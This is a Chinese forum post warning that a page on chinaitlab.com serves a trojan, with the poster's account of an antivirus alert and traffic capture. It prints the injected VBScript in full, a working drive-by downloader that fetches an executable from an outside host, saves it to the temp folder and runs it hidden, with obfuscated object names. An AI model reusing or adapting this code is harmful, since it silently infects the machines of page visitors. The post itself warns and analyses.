倒，chinaitlab.com也放木马

为了避免大家直接点击进去了，我把网址最后的一个l去掉了

http://linux.chinaitlab.com/kernel/398660.htm  +l 

刚才找linux资料访问到这个页面时，Norton报警了，用wiinsock expert分析了下，下回来http://www.zn360.com/tt/ufo.ht(我把网址后的m去掉了）

一看代码，原来是这样的

[code]

from:http://linux.chinaitlab.com/kernel/398660.html
<html>
<script language="VBScript">
  on error resume next
  dl = "http://www.zn360.com/tt/qq520.exe"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)
  S.open
  fname1= F.BuildPath(tmp,fname1)
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject("Shell.Application","")
  Q.ShellExecute fname1,"","","open",0
  </script>
  <head>
  <title>Oh,my god!</title>
  </head><body>
  <center>You DO it!</center>
  </body></html>
[/code]

faint,想不到chanaitlab也挂马（当然，不排除是广告商的页面有马），但无论如何，罪不可卸！

唉，常在网上走，千万要小心了！